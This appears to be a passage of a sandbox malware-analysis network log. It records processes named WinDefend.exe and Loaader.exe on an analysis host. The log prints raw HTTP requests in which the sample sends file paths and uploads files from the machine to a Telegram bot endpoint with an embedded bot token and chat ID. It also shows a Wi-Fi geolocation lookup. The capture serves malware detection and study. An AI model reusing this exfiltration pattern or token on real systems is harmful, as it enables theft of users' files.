123	192.168.2.5	61165	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:05 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 192 Expect: 100-continue
2024-05-23 13:35:05 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:05 UTC	192	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 6a 61 70 61 6e 65 73 65 5f 6f 76 65 72 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 6a 61 70 61 6e 65 73 65 5f 6f 76 65 72 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 35 36 38 2b 42 Data Ascii: chat_id=1655240967&text=File%3A+japanese_over.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Cjapanese_over.png%0ASize%3A+568+B
2024-05-23 13:35:06 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:06 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.5	61166	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:05 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 347 Expect: 100-continue
2024-05-23 13:35:06 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:06 UTC	347	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 39 36 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 74 Data Ascii: chat_id=1655240967&text=File%3A+96.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applicat
2024-05-23 13:35:06 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:06 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.5	61168	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:05 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="f7efe596-b9a4-4a9d-a72b-cecb105c947d" Host: api.telegram.org Content-Length: 12105 Expect: 100-continue
2024-05-23 13:35:06 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:06 UTC	40	OUT	Data Raw: 2d 2d 66 37 65 66 65 35 39 36 2d 62 39 61 34 2d 34 61 39 64 2d 61 37 32 62 2d 63 65 63 62 31 30 35 63 39 34 37 64 0d 0a Data Ascii: --f7efe596-b9a4-4a9d-a72b-cecb105c947d
2024-05-23 13:35:06 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 30 37 31 63 33 34 32 39 64 34 39 30 30 65 39 61 35 63 30 64 34 65 32 31 30 35 63 63 66 31 63 32 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 30 37 31 63 33 34 32 39 64 34 39 30 30 65 39 61 35 63 30 64 34 65 32 31 30 35 63 63 66 31 63 32 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=071c3429d4900e9a5c0d4e2105ccf1c2.png; filename*=utf-8''071c3429d4900e9a5c0d4e2105ccf1c2.png
2024-05-23 13:35:06 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 01 f4 08 02 00 00 00 44 b4 48 dd 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 20 00 49 44 41 54 78 9c ed dd 7f 54 54 e7 bd ef f1 27 1a 9d d9 10 a3 0c 04 01 8d 0a 62 44 04 d2 10 13 50 e4 5e 2b 4a 8e 89 d5 34 36 c7 16 6d 4f ee 89 f6 b6 a7 ab a6 a6 b7 27 bf da 75 73 9b 36 a6 a7 f7 d4 68 d6 39 ed ad e4 b4 b7 51 13 57 62 a3 c6 26 37 46 ac 6b a1 11 1a c3 69 80 20 fe 00 94 c2 f0 43 9c 91 90 61 83 46 73 ff 98 64 20 cc de c3 00 33 b3 f7 3c fb fd 5a fd 43 86 99 bd bf 59 d5 0f 0f df fd fc b8 e1 d3 86 3a 01 00 90 cb 38 a3 0b 00 00 84 1e e1 0e 00 12 22 dc 01 40 42 84 3b 00 48 88 70 07 00 09 11 ee 00 20 21 c2 1d 00 24 44 b8 03 80 84 08 77 00 90 10 e1 0e 00 12 22 dc 01 40 42 84 3b Data Ascii: PNGIHDRDHpHYs~ IDATxTT'bDP^+J46mO'us6h9QWb&7Fki CaFsd 3<ZCY:8"@B;Hp !$Dw"@B;
2024-05-23 13:35:06 UTC	4096	OUT	Data Raw: bf d0 dc 38 a2 db 01 56 46 b8 43 5c eb 68 f1 ce 87 09 10 d6 13 07 b5 65 ae 75 b4 5c fe e5 a3 1d eb 17 ba 9e de 70 b5 e1 c3 e0 6f a4 b9 1c e9 fe fb bf 3e a2 6a 01 04 83 07 aa 10 7d c7 ff 9f 10 e2 4a 75 85 ab ba 62 fc d4 e9 31 c5 0f c6 3e b0 61 dc 4d 37 8f 4f ba 75 c8 3b fb 3f 38 d1 f3 87 5f 0d 7e ca da fb f6 ab 93 ff 29 a8 9d ad ea eb 6b fd 27 c9 28 4a cc 9d b9 f9 41 d6 39 73 86 29 16 d6 02 51 81 91 3b 44 ef db af fa fe 7c ad a3 a5 e7 a5 ad ed 5f 9d 7f f9 97 8f 7e fa 71 b7 ef f5 be e3 6f 77 fd f0 c1 4b ff e3 ef 87 cc 9f e9 7b 37 d8 ce 8c e6 2a 53 ef f4 18 8d 92 78 76 0a 8c 0d 23 77 ab bb fe f1 47 57 1b 35 36 8f eb 3d f4 ea e0 2f 3d af bf 38 c6 1b d5 d7 6b 3c 4a cd cd d5 98 15 23 84 68 6e 6e f2 7f 31 21 21 71 8c 35 00 d6 41 b8 5b dd b8 9b 6e 9e f2 a3 5f 5d Data Ascii: 8VFC\heu\po>j}Jub1>aM7Ou;?8_~)k'(JA9s)Q;D\|_~qowK{7*Sxv#wGW56=/=8k<J#hnn1!!q5A[n_]
2024-05-23 13:35:06 UTC	3537	OUT	Data Raw: 81 bb b3 65 60 a2 c8 fb 47 5b cf fc b5 6b 56 46 5c 4a ea a4 89 f6 f1 06 d6 86 4b 6d bd ce f3 3d 83 63 dd eb 2b df 4a 0f e5 b0 bd a7 3b 84 87 2b e9 ad 00 2a 59 51 3c 8a 65 9f cb f2 16 1c 15 46 87 72 00 00 0d 77 49 44 41 54 ae 7c 4f f3 11 eb e1 ca 93 df 7e 40 77 0d 5a 90 4e 54 6b 77 f6 65 6d b8 0b c2 dd 52 d6 6f ce dc b9 b5 6e 70 be f7 5c ee af a9 68 af a9 08 cd 7c 67 84 d6 ca 6f a5 df 76 7b 08 4e a8 18 e0 be 38 fc 7b 82 d3 e1 72 6b ee b9 98 e8 88 5b bd a4 70 74 d7 dc bc fe eb 0f 3f ad b1 df f2 d8 97 1a 79 77 91 f4 7f 3d 24 1b c4 9b 16 6d 19 0b b1 2b 37 ae df 9c 39 63 ce cd 46 17 82 61 d8 94 f1 21 9e 21 23 42 3c 6c 6f 6a d1 ee e9 8d 3a d9 85 10 53 1d 71 61 5a 6a b4 fb 4d ed 25 51 12 0f db 05 e1 6e 35 76 e5 c6 f5 9b e7 af fc 56 ba 4d a1 0f 63 52 d9 f9 b7 6c Data Ascii: e`G[kVF\JKm=c+J;+*YQ<eFrwIDAT\|O~@wZNTkwemRonp\h\|gov{N8{rk[pt?yw=$m+79cFa!!#B<loj:SqaZjM%Qn5vVMcRl
2024-05-23 13:35:06 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 66 37 65 66 65 35 39 36 2d 62 39 61 34 2d 34 61 39 64 2d 61 37 32 62 2d 63 65 63 62 31 30 35 63 39 34 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --f7efe596-b9a4-4a9d-a72b-cecb105c947dContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:06 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:06 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 66 37 65 66 65 35 39 36 2d 62 39 61 34 2d 34 61 39 64 2d 61 37 32 62 2d 63 65 63 62 31 30 35 63 39 34 37 64 2d 2d 0d 0a Data Ascii: --f7efe596-b9a4-4a9d-a72b-cecb105c947d--
2024-05-23 13:35:06 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:06 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.5	61170	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:06 UTC	232	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="b6cb405c-04eb-43d6-ba00-d6409730876d" Host: api.telegram.org Content-Length: 906 Expect: 100-continue
2024-05-23 13:35:07 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:07 UTC	40	OUT	Data Raw: 2d 2d 62 36 63 62 34 30 35 63 2d 30 34 65 62 2d 34 33 64 36 2d 62 61 30 30 2d 64 36 34 30 39 37 33 30 38 37 36 64 0d 0a Data Ascii: --b6cb405c-04eb-43d6-ba00-d6409730876d
2024-05-23 13:35:07 UTC	113	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 6a 61 70 61 6e 65 73 65 5f 6f 76 65 72 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 6a 61 70 61 6e 65 73 65 5f 6f 76 65 72 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=japanese_over.png; filename*=utf-8''japanese_over.png
2024-05-23 13:35:07 UTC	568	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 23 00 00 00 0b 08 06 00 00 00 f5 26 34 02 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 15 74 45 58 74 43 72 65 61 74 69 6f 6e 20 54 69 6d 65 00 34 2f 32 38 2f 31 31 3c 48 7c 01 00 00 00 1c 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 46 69 72 65 77 6f 72 6b 73 20 43 53 35 71 b5 e3 36 00 00 01 91 49 44 41 54 38 8d 95 54 c1 8d 84 30 0c 9c 3d 51 00 1d dc 96 40 09 91 d2 00 25 f0 f3 2b 52 4a a0 84 95 fc ca 2f 25 d0 80 a5 94 c0 75 90 12 b6 84 7b e0 ec 86 1c 9c 58 4b 88 60 7b 26 13 db e4 66 5d e8 01 0c 38 b7 2c 4c f9 2c 68 5d 58 85 e9 10 6f 5d 98 00 4c e5 5b 98 8c 75 21 1d a4 ae c2 e4 3b 15 32 03 38 4a ba 03 c8 1a 3f b3 Data Ascii: PNGIHDR#&4sBIT\|dpHYs~tEXtCreation Time4/28/11<H\|tEXtSoftwareAdobe Fireworks CS5q6IDAT8T0=Q@%+RJ/%u{XK`{&f]8,L,h]Xo]L[u!;28J?
2024-05-23 13:35:07 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 62 36 63 62 34 30 35 63 2d 30 34 65 62 2d 34 33 64 36 2d 62 61 30 30 2d 64 36 34 30 39 37 33 30 38 37 36 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --b6cb405c-04eb-43d6-ba00-d6409730876dContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:07 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:07 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 62 36 63 62 34 30 35 63 2d 30 34 65 62 2d 34 33 64 36 2d 62 61 30 30 2d 64 36 34 30 39 37 33 30 38 37 36 64 2d 2d 0d 0a Data Ascii: --b6cb405c-04eb-43d6-ba00-d6409730876d--
2024-05-23 13:35:07 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:07 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.5	61171	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:06 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="b7298f88-349a-440b-b738-c6ccb7741a2b" Host: api.telegram.org Content-Length: 7031 Expect: 100-continue
2024-05-23 13:35:07 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:07 UTC	40	OUT	Data Raw: 2d 2d 62 37 32 39 38 66 38 38 2d 33 34 39 61 2d 34 34 30 62 2d 62 37 33 38 2d 63 36 63 63 62 37 37 34 31 61 32 62 0d 0a Data Ascii: --b7298f88-349a-440b-b738-c6ccb7741a2b
2024-05-23 13:35:07 UTC	91	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 39 36 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 39 36 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=96.png; filename*=utf-8''96.png
2024-05-23 13:35:07 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 60 00 00 00 60 08 06 00 00 00 e2 98 77 38 00 00 1a 02 49 44 41 54 78 9c ed 5d 6b ac 65 55 7d ff fd d7 de e7 dc 73 ee 9d 3b 33 c0 dc 11 71 50 68 b1 1a 41 d3 08 da d6 b6 74 da 1a ab d6 26 da 64 a0 a4 56 db 6a fc 64 1a fb ad 5f ac 43 63 d2 0f 4d 9a a6 8d ad 8d 46 ad 2f 94 c1 07 a1 a8 44 81 e9 43 04 b4 c6 04 01 8b 3c 06 06 86 79 31 cc dc c7 dc 73 cf d9 6b fd fa 61 3d f6 da 6b af 7d ee 1d 40 63 e3 59 c9 c9 dd 8f b5 d7 fa ff 7f ff e7 7a ec 7d 81 59 99 95 59 99 95 59 99 95 59 99 95 59 99 95 59 99 95 59 99 95 59 99 95 59 f9 79 29 f2 42 37 c8 66 9b e1 f8 00 20 fb f6 01 c0 be 46 fd 83 27 4e c8 de 73 e9 60 69 89 c0 01 e0 00 70 70 ef 5e fb ec c1 83 04 00 ec db 07 9c 38 b1 65 9e 0e 02 d8 bb b4 c4 40 a1 fb 73 c0 Data Ascii: PNGIHDR``w8IDATx]keU}s;3qPhAt&dVjd_CcMF/DC<y1ska=k}@cYz}YYYYYYYYYy)B7f F'Ns`ipp^8e@s
2024-05-23 13:35:07 UTC	2619	OUT	Data Raw: 1e 7e 08 52 96 50 db 16 00 53 bf b5 d9 78 9b 37 d6 fe 18 fc 94 b7 06 2f ee 34 c5 c1 67 2a 71 f0 f5 f7 54 94 c5 88 01 8c 02 dc 86 75 23 ac 4a d0 ac 09 e4 7c d6 ef 79 b6 4b 97 66 b4 ac 86 b5 94 13 5f 6f ef 76 80 1f 34 5f 6a cd ca d4 6b 00 5f 14 90 c1 00 66 65 05 1b b7 de 8c d1 e7 3f 8d c9 fd 3f 84 14 05 d4 fc 02 00 03 68 d3 cc ae bb 62 56 ac 64 5b f0 04 39 ed 07 04 c2 4c f0 0d f2 f1 42 20 40 50 09 85 06 ab 25 88 55 25 f6 7d df 4d 4b 3c a2 ab b9 42 9c d3 b7 40 db 4c eb 3d a8 8e b1 1a 9c fa b8 01 bc 52 76 29 72 7d 1d 1b 5f bb 05 eb 9f fd 24 26 3f f8 3e 00 81 9a 9f b7 cf f9 17 bf 09 88 ca e7 ef a1 9f 74 bc e2 05 10 0b 24 7e 24 7d 3e d2 7e 32 17 7c 9d fb 11 a0 1e 4b f9 bd 4e 3c 5b 42 b0 ac 44 60 5f 61 cf 48 3e ea a3 41 a0 1f b6 fa 67 28 a0 44 39 bd 9f e1 88 18 Data Ascii: ~RPSx7/4g*qTu#J\|yKf_ov4_jk_fe??hbVd[9LB @P%U%}MK<B@L=Rv)r}_$&?>t$~$}>~2\|KN<[BD`_aH>Ag(D9
2024-05-23 13:35:07 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 62 37 32 39 38 66 38 38 2d 33 34 39 61 2d 34 34 30 62 2d 62 37 33 38 2d 63 36 63 63 62 37 37 34 31 61 32 62 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --b7298f88-349a-440b-b738-c6ccb7741a2bContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:07 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:07 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 62 37 32 39 38 66 38 38 2d 33 34 39 61 2d 34 34 30 62 2d 62 37 33 38 2d 63 36 63 63 62 37 37 34 31 61 32 62 2d 2d 0d 0a Data Ascii: --b7298f88-349a-440b-b738-c6ccb7741a2b--
2024-05-23 13:35:07 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:07 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.5	61172	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:07 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 258 Expect: 100-continue
2024-05-23 13:35:07 UTC	258	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 30 63 39 62 62 62 65 37 61 30 31 66 34 33 63 38 61 32 63 30 38 34 64 34 39 32 36 61 38 37 38 35 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 61 70 70 31 25 35 43 64 63 2d 64 65 73 6b 74 6f 70 2d 61 70 70 2d 64 72 6f 70 69 6e 25 35 43 31 2e 30 2e 30 5f 31 2e 30 2e 30 25 35 43 30 63 39 62 62 62 65 37 61 30 31 66 34 33 63 38 61 32 63 30 38 34 64 34 39 32 36 61 38 37 38 35 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 31 36 30 Data Ascii: chat_id=1655240967&text=File%3A+0c9bbbe7a01f43c8a2c084d4926a8785.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Capp1%5Cdc-desktop-app-dropin%5C1.0.0_1.0.0%5C0c9bbbe7a01f43c8a2c084d4926a8785.png%0ASize%3A+160
2024-05-23 13:35:07 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:07 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:07 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.5	61173	104.21.44.66	443	7392	C:\Users\user\AppData\Roaming\Loaader.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:07 UTC	112	OUT	GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1 Host: api.mylnikov.org Connection: Keep-Alive
2024-05-23 13:35:07 UTC	793	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 13:35:07 GMT Content-Type: application/json; charset=utf8 Content-Length: 88 Connection: close Access-Control-Allow-Origin: * Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 6069 Last-Modified: Thu, 23 May 2024 11:53:58 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ttK1OaoZQnm7MDvbjY7Emeu50nesEp0kH1b14GUMmUcxtuFVZAgBU%2BCeW0AYToJm%2Fkqefzzt%2FetNnOJdSBdL0b25DDfwyRvYZgMIiYp%2FEDiROpftWC%2F0Euln8w0TkwZW4PhC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 88856d689ab819ff-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 13:35:07 UTC	88	IN	Data Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 31 36 34 36 35 32 33 37 7d Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1716465237}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.5	61174	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:08 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 349 Expect: 100-continue
2024-05-23 13:35:08 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:08 UTC	349	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 31 32 38 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 Data Ascii: chat_id=1655240967&text=File%3A+128.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applica
